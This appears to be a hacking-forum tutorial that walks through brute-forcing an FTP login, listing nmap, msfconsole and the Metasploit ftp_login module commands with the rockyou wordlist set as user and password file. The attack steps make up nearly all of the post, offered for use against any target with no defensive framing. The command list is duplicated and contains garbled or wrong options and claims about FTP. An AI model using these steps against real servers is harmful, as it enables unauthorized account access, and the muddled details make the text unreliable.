Ftp mean " File Transfer1 Protocol " and all websites should have Ftp but sometime Admin can close the door of Ftp name " Port " is always 21 and open it when he want to login for changing or upload files to website.
In this tutorial i'm going to show you how to crack Ftp login page low and medium security
Operations System: Parrot OS
Commands that use inside Tutorial:
1- ping "url"
2-nmap -p 21 "ip"
3-msfconsole
4-use auxiliary/scanner/ftp/ftp_login -------------- use --exploit mean this kind of attack
5-set RHOST "ip" ----------- RHOST mean Target
6-set USER_FILE /root/Desktop/rockyou.txt --------- user_file mean username and i pick rockyou because best word list you can find it by search on name inside main folder(root)
7-set USER_AS_PASS true ---------- here you can use multi choices user as pass mean if username: Admin so make password also Admin
other commands for
7-set PASS_FILE /root/Desktop/rockyou.txt
7- set USER_PASS /root/Desktop/rockyou.txt
you can read good "options" and control your commands
link:
In this tutorial i'm going to show you how to crack Ftp login page low and medium security
Operations System: Parrot OS
Commands that use inside Tutorial:
1- ping "url"
2-nmap -p 21 "ip"
3-msfconsole
4-use auxiliary/scanner/ftp/ftp_login -------------- use --exploit mean this kind of attack
5-set RHOST "ip" ----------- RHOST mean Target
6-set USER_FILE /root/Desktop/rockyou.txt --------- user_file mean username and i pick rockyou because best word list you can find it by search on name inside main folder(root)
7-set USER_AS_PASS true ---------- here you can use multi choices user as pass mean if username: Admin so make password also Admin
other commands for
7-set PASS_FILE /root/Desktop/rockyou.txt
7- set USER_PASS /root/Desktop/rockyou.txt
you can read good "options" and control your commands
link:
To see this hidden content, you must reply and react with one of the following reactions :
Like,
Love,
Haha,
Wow,
Sad,
Angry
Last edited:









